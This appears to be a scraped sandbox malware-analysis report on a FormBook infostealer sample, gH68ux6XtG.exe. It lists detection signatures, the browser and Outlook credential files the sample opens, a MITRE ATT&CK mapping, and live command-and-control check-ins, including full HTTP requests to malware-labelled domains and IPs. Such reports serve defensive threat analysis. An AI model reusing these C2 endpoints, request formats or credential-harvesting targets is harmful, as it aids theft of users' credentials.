Source: Yara match	File source: 0000000B.00000002.3502216825.0000000000B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3501035690.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502706773.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756355640.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756183235.0000000000C61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502641258.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3502389846.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756898776.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\runonce.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.gH68ux6XtG.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3502216825.0000000000B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3501035690.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502706773.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756355640.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756183235.0000000000C61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3502641258.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3502389846.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2756898776.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	312 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: https://www.seasay.xyz/c9ts/?KDah=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJ	Avira URL Cloud: Label: malware
Source: http://www.l63339.xyz/vhr7/?Rl=zLDt8zjhv8V8v&KDah=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=	Avira URL Cloud: Label: malware
Source: http://www.seasay.xyz/c9ts/?KDah=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&Rl=zLDt8zjhv8V8v	Avira URL Cloud: Label: malware
Source: http://www.tumbetgirislinki.fit/k566/?Rl=zLDt8zjhv8V8v&KDah=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw=	Avira URL Cloud: Label: malware
Source: http://www.lucynoel6465.shop/jgkl/?KDah=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&Rl=zLDt8zjhv8V8v	Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/?Rl=zLDt8zjhv8V8v&KDah=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQhOBp6bvJfybAsgczbp7VbhpCIn0ionQvbdviepAhWZkBSZgiYzM=	Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/	Avira URL Cloud: Label: malware

Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then xor eax, eax		10_2_02C99EF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_04AA04E8

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50010 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50023 -> 134.122.133.80:80

Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
gH68ux6XtG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Source: gH68ux6XtG.exe	Virustotal: Detection: 76%			Perma Link
Source: gH68ux6XtG.exe	ReversingLabs: Detection: 78%

Source:	DNS query: www.l63339.xyz
Source:	DNS query: www.seasay.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vhr7/?Rl=zLDt8zjhv8V8v&KDah=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM= HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /c9ts/?KDah=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&Rl=zLDt8zjhv8V8v HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /k566/?Rl=zLDt8zjhv8V8v&KDah=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw= HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /jgkl/?KDah=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&Rl=zLDt8zjhv8V8v HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /e0jv/?Rl=zLDt8zjhv8V8v&KDah=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQhOBp6bvJfybAsgczbp7VbhpCIn0ionQvbdviepAhWZkBSZgiYzM= HTTP/1.1Host: www.kjuw.partyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

Source: global traffic	DNS traffic detected: DNS query: www.l63339.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic	DNS traffic detected: DNS query: www.lucynoel6465.shop
Source: global traffic	DNS traffic detected: DNS query: www.kjuw.party

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gH68ux6XtG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
gH68ux6XtG.exe